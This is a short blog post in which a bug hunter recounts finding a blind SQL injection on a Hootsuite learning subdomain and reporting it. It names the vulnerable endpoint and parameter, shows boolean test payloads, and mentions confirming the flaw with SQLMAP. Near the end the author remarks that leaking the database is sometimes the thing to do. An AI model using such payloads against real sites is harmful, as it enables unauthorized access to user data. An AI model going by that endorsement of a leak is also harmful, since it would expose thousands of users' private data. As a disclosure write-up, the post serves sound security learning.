Saturday, August 1, 2015

Blind SQL inejction [Hootsuite]

Hi , I will start publish some of my findings

In 2014 I found Blind SQL injection at hootsuite subdomain (https://learn.hootsuite.com)

Blind SQL Injection :
 Is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection 

When I signup for new account and explore the site , I saw the photos of users connected to php file to show as profile image .

I copy the link and go to it


it was good and the photo was  viewed well

Let's do magic things


the page was white totally white !!

this is look like SQLi I do many test and find out that it is blind sql injection

for example you can do simple test

1- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=1 

OK !!

2- https://learn.hootsuite.com/view_profile_image.php?id=8807 and 1=2 

Error !! 

I did not have much experience in sqli that time so I used SQLMAP to make sure that it is blind or not .

Type: boolean-based blind ; 
Database :hootsuite_u_v2

So  I was right.

I made report and send with all info and details.

I got

 I was surprised that a security team  dose not know what is sql injection I sent file,parameter,payload,and type .

After many messages and replies they fixed the sqli in months and block me I think !! because they tell me the will see if they can add me in hall of fame . I waited and nothing did try to contact them but no replay so I left them .

Sometimes you should do bad things like leak the DB !!! .
There were 10k users or 100k I do not remember .
That is all about .

Thanks for read .

 Useful links :
1- https://www.owasp.org/index.php/Blind_SQL_Injection
2- https://en.wikipedia.org/wiki/SQL_injection 
3- https://www.acunetix.com/websitesecurity/blind-sql-injection/
4- https://hackerone.com/reports/21899
5- There are many cool articles and writes-up about SQLi you can look for.


No comments:

Post a Comment